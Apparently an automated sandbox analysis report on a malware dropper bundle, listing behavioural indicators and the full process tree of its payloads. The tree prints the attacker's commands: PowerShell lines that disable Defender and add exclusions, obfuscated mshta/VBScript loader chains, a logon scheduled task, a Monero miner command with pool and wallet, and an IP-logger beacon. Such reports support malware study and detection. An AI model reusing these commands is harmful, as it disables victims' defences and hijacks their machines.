pid Process 1856 powershell.exe 1452 powershell.exe 1168 Wed09b2a8bc4f16cb.exe 1168 Wed09b2a8bc4f16cb.exe 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1648 Wed09d8d6edfaff2ac.exe 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe 320 Wed09977fdc12334.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 1288 Process not Found 688 WerFault.exe 2976 WerFault.exe 2860 WerFault.exe 1604 WerFault.exe 3652 WerFault.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1168 Wed09b2a8bc4f16cb.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 2988 7225029.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1104 Wed09db0d52c38.exe Token: SeAssignPrimaryTokenPrivilege 1104 Wed09db0d52c38.exe Token: SeLockMemoryPrivilege 1104 Wed09db0d52c38.exe Token: SeIncreaseQuotaPrivilege 1104 Wed09db0d52c38.exe Token: SeMachineAccountPrivilege 1104 Wed09db0d52c38.exe Token: SeTcbPrivilege 1104 Wed09db0d52c38.exe Token: SeSecurityPrivilege 1104 Wed09db0d52c38.exe Token: SeTakeOwnershipPrivilege 1104 Wed09db0d52c38.exe Token: SeLoadDriverPrivilege 1104 Wed09db0d52c38.exe Token: SeSystemProfilePrivilege 1104 Wed09db0d52c38.exe Token: SeSystemtimePrivilege 1104 Wed09db0d52c38.exe Token: SeProfSingleProcessPrivilege 1104 Wed09db0d52c38.exe Token: SeIncBasePriorityPrivilege 1104 Wed09db0d52c38.exe Token: SeCreatePagefilePrivilege 1104 Wed09db0d52c38.exe Token: SeCreatePermanentPrivilege 1104 Wed09db0d52c38.exe Token: SeBackupPrivilege 1104 Wed09db0d52c38.exe Token: SeRestorePrivilege 1104 Wed09db0d52c38.exe Token: SeShutdownPrivilege 1104 Wed09db0d52c38.exe Token: SeDebugPrivilege 1104 Wed09db0d52c38.exe Token: SeAuditPrivilege 1104 Wed09db0d52c38.exe Token: SeSystemEnvironmentPrivilege 1104 Wed09db0d52c38.exe Token: SeChangeNotifyPrivilege 1104 Wed09db0d52c38.exe Token: SeRemoteShutdownPrivilege 1104 Wed09db0d52c38.exe Token: SeUndockPrivilege 1104 Wed09db0d52c38.exe Token: SeSyncAgentPrivilege 1104 Wed09db0d52c38.exe Token: SeEnableDelegationPrivilege 1104 Wed09db0d52c38.exe Token: SeManageVolumePrivilege 1104 Wed09db0d52c38.exe Token: SeImpersonatePrivilege 1104 Wed09db0d52c38.exe Token: SeCreateGlobalPrivilege 1104 Wed09db0d52c38.exe Token: 31 1104 Wed09db0d52c38.exe Token: 32 1104 Wed09db0d52c38.exe Token: 33 1104 Wed09db0d52c38.exe Token: 34 1104 Wed09db0d52c38.exe Token: 35 1104 Wed09db0d52c38.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 1208 Wed096a1bff61.exe Token: SeDebugPrivilege 3040 4.exe Token: SeDebugPrivilege 776 5.exe Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeDebugPrivilege 2900 BCleanSoft82.exe Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeDebugPrivilege 1984 Wed09b3a5ca1a712d390.exe Token: SeDebugPrivilege 2976 WerFault.exe Token: SeDebugPrivilege 688 WerFault.exe Token: SeDebugPrivilege 2860 WerFault.exe Token: SeDebugPrivilege 1604 WerFault.exe Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeDebugPrivilege 2908 taskkill.exe Token: SeDebugPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 2380 cmd.exe Token: SeDebugPrivilege 3084 10.exe Token: SeShutdownPrivilege 1288 Process not Found Token: SeShutdownPrivilege 1288 Process not Found Token: SeDebugPrivilege 2028 Process not Found Token: SeDebugPrivilege 888 Process not Found Token: SeDebugPrivilege 3652 WerFault.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 2328 Wed09d27135e5a8b3b.tmp 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1288 Process not Found 1288 Process not Found 1508 run2.exe 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1508 run2.exe 1508 run2.exe 1508 run2.exe 1508 run2.exe 1508 run2.exe 1508 run2.exe 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 3036 iexplore.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1816 Wed09e95ff6b5.exe 1508 run2.exe 1288 Process not Found 1288 Process not Found 1508 run2.exe 1508 run2.exe 1508 run2.exe 1508 run2.exe 1508 run2.exe 1508 run2.exe 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found 1288 Process not Found -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3036 iexplore.exe 3036 iexplore.exe 3504 IEXPLORE.EXE 3504 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1608 wrote to memory of 568 1608 setup_installer.exe 28 PID 1608 wrote to memory of 568 1608 setup_installer.exe 28 PID 1608 wrote to memory of 568 1608 setup_installer.exe 28 PID 1608 wrote to memory of 568 1608 setup_installer.exe 28 PID 1608 wrote to memory of 568 1608 setup_installer.exe 28 PID 1608 wrote to memory of 568 1608 setup_installer.exe 28 PID 1608 wrote to memory of 568 1608 setup_installer.exe 28 PID 568 wrote to memory of 1580 568 setup_install.exe 30 PID 568 wrote to memory of 1580 568 setup_install.exe 30 PID 568 wrote to memory of 1580 568 setup_install.exe 30 PID 568 wrote to memory of 1580 568 setup_install.exe 30 PID 568 wrote to memory of 1580 568 setup_install.exe 30 PID 568 wrote to memory of 1580 568 setup_install.exe 30 PID 568 wrote to memory of 1580 568 setup_install.exe 30 PID 568 wrote to memory of 1624 568 setup_install.exe 31 PID 568 wrote to memory of 1624 568 setup_install.exe 31 PID 568 wrote to memory of 1624 568 setup_install.exe 31 PID 568 wrote to memory of 1624 568 setup_install.exe 31 PID 568 wrote to memory of 1624 568 setup_install.exe 31 PID 568 wrote to memory of 1624 568 setup_install.exe 31 PID 568 wrote to memory of 1624 568 setup_install.exe 31 PID 1624 wrote to memory of 1452 1624 cmd.exe 33 PID 1624 wrote to memory of 1452 1624 cmd.exe 33 PID 1624 wrote to memory of 1452 1624 cmd.exe 33 PID 1624 wrote to memory of 1452 1624 cmd.exe 33 PID 1624 wrote to memory of 1452 1624 cmd.exe 33 PID 1624 wrote to memory of 1452 1624 cmd.exe 33 PID 1624 wrote to memory of 1452 1624 cmd.exe 33 PID 1580 wrote to memory of 1856 1580 cmd.exe 32 PID 1580 wrote to memory of 1856 1580 cmd.exe 32 PID 1580 wrote to memory of 1856 1580 cmd.exe 32 PID 1580 wrote to memory of 1856 1580 cmd.exe 32 PID 1580 wrote to memory of 1856 1580 cmd.exe 32 PID 1580 wrote to memory of 1856 1580 cmd.exe 32 PID 1580 wrote to memory of 1856 1580 cmd.exe 32 PID 568 wrote to memory of 960 568 setup_install.exe 34 PID 568 wrote to memory of 960 568 setup_install.exe 34 PID 568 wrote to memory of 960 568 setup_install.exe 34 PID 568 wrote to memory of 960 568 setup_install.exe 34 PID 568 wrote to memory of 960 568 setup_install.exe 34 PID 568 wrote to memory of 960 568 setup_install.exe 34 PID 568 wrote to memory of 960 568 setup_install.exe 34 PID 568 wrote to memory of 1524 568 setup_install.exe 35 PID 568 wrote to memory of 1524 568 setup_install.exe 35 PID 568 wrote to memory of 1524 568 setup_install.exe 35 PID 568 wrote to memory of 1524 568 setup_install.exe 35 PID 568 wrote to memory of 1524 568 setup_install.exe 35 PID 568 wrote to memory of 1524 568 setup_install.exe 35 PID 568 wrote to memory of 1524 568 setup_install.exe 35 PID 568 wrote to memory of 860 568 setup_install.exe 36 PID 568 wrote to memory of 860 568 setup_install.exe 36 PID 568 wrote to memory of 860 568 setup_install.exe 36 PID 568 wrote to memory of 860 568 setup_install.exe 36 PID 568 wrote to memory of 860 568 setup_install.exe 36 PID 568 wrote to memory of 860 568 setup_install.exe 36 PID 568 wrote to memory of 860 568 setup_install.exe 36 PID 568 wrote to memory of 1956 568 setup_install.exe 41 PID 568 wrote to memory of 1956 568 setup_install.exe 41 PID 568 wrote to memory of 1956 568 setup_install.exe 41 PID 568 wrote to memory of 1956 568 setup_install.exe 41 PID 568 wrote to memory of 1956 568 setup_install.exe 41 PID 568 wrote to memory of 1956 568 setup_install.exe 41 PID 568 wrote to memory of 1956 568 setup_install.exe 41 PID 568 wrote to memory of 1736 568 setup_install.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe3⤵
- Loads dropped DLL
PID:960 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe4⤵
- Executes dropped EXE
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe3⤵
- Loads dropped DLL
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1984 -
C:\Users\Admin\AppData\Roaming\4763433.exe"C:\Users\Admin\AppData\Roaming\4763433.exe"5⤵
- Executes dropped EXE
PID:1004
-
-
C:\Users\Admin\AppData\Roaming\8908199.exe"C:\Users\Admin\AppData\Roaming\8908199.exe"5⤵
- Executes dropped EXE
PID:888
-
-
C:\Users\Admin\AppData\Roaming\7094118.exe"C:\Users\Admin\AppData\Roaming\7094118.exe"5⤵
- Executes dropped EXE
PID:2608
-
-
C:\Users\Admin\AppData\Roaming\3071403.exe"C:\Users\Admin\AppData\Roaming\3071403.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2292 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"6⤵
- Executes dropped EXE
PID:2904
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe3⤵
- Loads dropped DLL
PID:860 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1648 -
C:\Users\Admin\Pictures\Adobe Films\rmCgodR4hKzuKTKdZIMofbLp.exe"C:\Users\Admin\Pictures\Adobe Films\rmCgodR4hKzuKTKdZIMofbLp.exe"5⤵
- Executes dropped EXE
PID:1572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 15125⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe3⤵
- Loads dropped DLL
PID:240 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09db0d52c38.exeWed09db0d52c38.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:2808
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe3⤵
- Loads dropped DLL
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:956 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed0901eb1dae126e32.exe5⤵PID:1540
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe3⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed0971f17486f8.exeWed0971f17486f8.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:552 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed0971f17486f8.exe5⤵
- Executes dropped EXE
PID:2692
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe3⤵
- Loads dropped DLL
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed096a1bff61.exeWed096a1bff61.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:2784 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2900 -
C:\Users\Admin\AppData\Roaming\7637304.exe"C:\Users\Admin\AppData\Roaming\7637304.exe"7⤵
- Executes dropped EXE
PID:1076
-
-
C:\Users\Admin\AppData\Roaming\5856220.exe"C:\Users\Admin\AppData\Roaming\5856220.exe"7⤵
- Executes dropped EXE
PID:1580
-
-
C:\Users\Admin\AppData\Roaming\2833926.exe"C:\Users\Admin\AppData\Roaming\2833926.exe"7⤵
- Executes dropped EXE
PID:2028
-
-
C:\Users\Admin\AppData\Roaming\8225450.exe"C:\Users\Admin\AppData\Roaming\8225450.exe"7⤵
- Executes dropped EXE
PID:1272
-
-
C:\Users\Admin\AppData\Roaming\7225029.exe"C:\Users\Admin\AppData\Roaming\7225029.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2988
-
-
C:\Users\Admin\AppData\Roaming\7695555.exe"C:\Users\Admin\AppData\Roaming\7695555.exe"7⤵
- Executes dropped EXE
PID:2660
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵
- Executes dropped EXE
PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"6⤵
- Executes dropped EXE
PID:3008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 9647⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3040 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3040 -s 13847⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:776 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 776 -s 13967⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"6⤵
- Executes dropped EXE
PID:1300 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:2944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"8⤵PID:1732
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"9⤵
- Kills process with taskkill
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi9⤵
- Executes dropped EXE
PID:1748 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:3076
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"11⤵
- Executes dropped EXE
PID:3176
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )10⤵PID:4088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC11⤵PID:3284
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"12⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵PID:2564
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC12⤵PID:3968
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
- Executes dropped EXE
PID:2280 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit7⤵PID:1212
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f8⤵
- Kills process with taskkill
PID:2380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"6⤵
- Executes dropped EXE
PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"6⤵PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"6⤵PID:3176
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:3964
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:4068
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
- Creates scheduled task(s)
PID:3784
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3672
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe9⤵
- Executes dropped EXE
PID:1224 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:3308
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"11⤵
- Executes dropped EXE
PID:2464 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"12⤵PID:2868
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth11⤵PID:1732
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe3⤵
- Loads dropped DLL
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\7zS8462CED5\Wed09e95ff6b5.exeWed09e95ff6b5.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1816 -
C:\Users\Public\run.exeC:\Users\Public\run.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2252 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\mm.exe"C:\Users\Admin\AppData\Local\Temp\mm.exe"7⤵PID:3124
-
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1508 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji76⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3036 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3036 CREDAT:275457 /prefetch:27⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3504
-
-
-
-
-
-
